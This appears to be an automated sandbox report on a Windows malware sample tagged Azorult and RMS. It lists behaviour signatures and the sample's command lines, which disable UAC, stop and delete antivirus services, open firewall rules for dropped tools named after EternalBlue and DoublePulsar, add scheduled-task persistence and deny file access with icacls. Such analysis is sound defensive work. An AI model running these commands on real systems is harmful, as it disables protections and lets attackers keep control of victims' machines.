Analysis Overview
SHA256
dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
Threat Level: Known bad
The file dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360 was found to be: Known bad.
Malicious Activity Summary
Modifies visibility of hidden/system files in Explorer
UAC bypass
Windows security bypass
RMS
Modifies Windows Defender Real-time Protection settings
Azorult
ACProtect 1.3x - 1.4x DLL software
Grants admin privileges
ASPack v2.12-2.42
Blocks application from running via registry modification
Stops running service(s)
Sets DLL path for service in the registry
UPX packed file
Sets file to hidden
Drops file in Drivers directory
Executes dropped EXE
Modifies Windows Firewall
Modifies file permissions
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Modifies WinLogon
Looks up external IP address via web service
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Drops file in System32 directory
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Runs net.exe
Modifies registry class
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Gathers network information
System policy modification
Views/modifies file attributes
Suspicious behavior: LoadsDriver
Runs .reg file with regedit
Creates scheduled task(s)
Delays execution with timeout.exe
Kills process with taskkill
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: SetClipboardViewer
Suspicious behavior: EnumeratesProcesses
NTFS ADS
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-16 19:23
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-16 19:23
Reported
2022-05-16 19:32
Platform
win7-20220414-en
Max time kernel
155s
Max time network
158s
Command Line
Signatures
Azorult
Modifies Windows Defender Real-time Protection settings
Modifies visibility of hidden/system files in Explorer
RMS
UAC bypass
Windows security bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Executes dropped EXE
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Note: the indicator is the WMI moniker winmgmts:\localhost\root\CIMV2 resolved relative to the process working directory; the colon in the moniker is what trips the ADS heuristic, so treat this hit as a likely false positive rather than evidence of an alternate data stream.
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe
"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF94.tmp\FF95.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {8D3E92CE-8DF4-42AF-AC47-B2C46AFF42DA} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
